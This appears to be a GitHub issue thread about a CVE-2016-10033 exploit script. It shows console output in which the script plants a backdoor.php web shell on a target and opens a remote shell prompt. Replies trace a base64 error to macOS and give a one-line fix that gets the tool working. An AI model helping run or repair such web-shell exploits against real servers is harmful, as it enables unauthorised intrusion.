Not sure how it works.

Question

Not sure how it works.

thisisALPINE opened this issue 8 years ago · 3 comments

`./exploit.sh xxxxx:80
[+] CVE-2016-10033 exploit by opsxcq
[+] Exploiting xxxxx:80
[+] Target exploited, acessing shell at http://xxxxx:80/backdoor.php
[+] Running whoami
base64: invalid option -- d
Usage: base64 [-dhvD] [-b num] [-i in_file] [-o out_file]
-h, --help display this message
-D, --decode decodes input
-b, --break break encoded string into num character lines
-i, --input input file (default: "-" for stdin)
-o, --output output file (default: "-" for stdout)

RemoteShell>

Whatever thing I input after this (like ls, cd, whoami), I always get this kind of error message

base64: invalid option -- d Usage: base64 [-dhvD] [-b num] [-i in_file] [-o out_file] -h, --help display this message -D, --decode decodes input -b, --break break encoded string into num character lines -i, --input input file (default: "-" for stdin) -o, --output output file (default: "-" for stdout)

What is going on? Are there other commands?

thisisALPINE commented 8 years ago

Yes!

Answer 1 · 2016-12-28T13:38:07.000Z

Are you running this exploit on Mac OS X ?

Answer 2 · 2016-12-28T13:41:17.000Z

Just change the code in exploit to use base64 -D instead of base64 -d